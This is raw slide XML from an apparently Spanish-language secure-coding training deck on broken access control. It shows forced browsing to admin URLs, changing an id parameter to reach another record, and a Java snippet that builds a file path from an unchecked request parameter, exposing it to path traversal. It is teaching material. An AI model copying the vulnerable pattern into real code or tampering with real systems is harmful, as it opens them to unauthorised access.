                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> para garantizar la calidad de los resultados y satisfacer las necesidades de todas las partes.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b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requisitos </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>propios de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>seguridad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> para evitar agujeros de seguridad con posible impacto para la organización y personas.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9208837"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1351954">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cómo se mide/identifica</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="es-ES" sz="1400" b="1" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="es-ES" sz="1400" b="1" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="es-ES" sz="1400" b="1" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Apreciación por parte de usuarios y pruebas de calidad específicas.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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Uso de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>herramientas y pruebas especializadas </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1400" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>en Ciberseguridad.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1626903"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BC9B299-DDBD-9301-A501-CA614E5A43F2}"/>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790369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566D-5559-178B-9431-6386E832F41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503142D-1758-B47B-3DD4-61B2A1F66246}"/>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2B1C9B77-1679-23F5-CB1C-9090E55470DB}"/>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01. Control de Acceso roto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44D16BE9-F919-ED86-4CFB-70366DBFFAF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8" name="CuadroTexto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4ED0AD-A931-13EC-A776-17B6657DE728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501435" y="1203327"/>
            <a:ext cx="10697395" cy="2031325"/>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El atacante fuerza la navegación a las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> objetivo. Es necesario disponer de derechos de administración para acceder a la página de gestión:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://example.com/app/getappInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://example.com/app/admin_getappInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Es un fallo debido a que un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usuario no autenticado puede acceder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a cualquiera de las dos páginas. Un usuario puede acceder a la página de administración.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F038363B-E80C-9EE8-B635-B6D91E25B681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501436" y="3714862"/>
            <a:ext cx="10574106" cy="2031325"/>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El atacante fuerza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acceder a un recurso no autorizado manipulando parámetros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Por ejemplo, para acceder a un registro con id=525</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://example.com?id=525</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Podría intentar acceder a un registro al que no tuviera acceso sin más que cambiar el parámetro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://example.com?id=1050</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Conector recto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B3EDB3-A507-CF1E-8A14-55CAE37F4ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982808" y="3531740"/>
            <a:ext cx="9089583" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="193330"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2" descr="Malo - Iconos gratis de negocios y finanzas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1706D843-175B-E2DF-49EC-431EA1170B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7073" y="1203327"/>
            <a:ext cx="896938" cy="89693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54BF7D49-FB5C-5989-C7A5-DA514F3B6688}"/>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557724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6C405-51EC-5CFB-D89F-980375D5895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F4314B2-33A4-499E-D521-A2614108D097}"/>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5B30E92-8A6D-CEC2-60E5-73D73129A7C3}"/>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01. Control de Acceso roto - Ejemplo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1045A1B6-9E30-37C3-6F6B-A7F78937D13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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3A8180-B43A-DCCC-815D-F3CD41D6962C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511710" y="1571683"/>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Raleway" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930AE3DB-F152-C916-3FA9-1EBF0454C1AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524934" y="3253944"/>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Raleway" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0A36442-A2F6-8324-3988-F45990D6D914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511710" y="4654642"/>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Raleway" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CuadroTexto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AF0B423-ACAE-5725-8216-7878EFED62D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993187" y="1421570"/>
            <a:ext cx="8743307" cy="1754326"/>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La aplicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>guarda un fichero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cuyo nombre es enviado como parámetro</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> nombre = “/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uploads</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request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(“nombre”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BufferedWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BufferedWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(nombre, true));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     // Proceso del fichero    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC24DA6A-CCB8-DCD1-B4B7-52D7E714F3FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993187" y="3544189"/>
            <a:ext cx="10031638" cy="2308324"/>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El atacante manipula la ruta en la que se va a crear el fichero, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pasando como parámetro ‘nombre’ el valor ‘</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otra_carpeta</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nombre_fichero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Como consecuencia el fichero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>se crea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
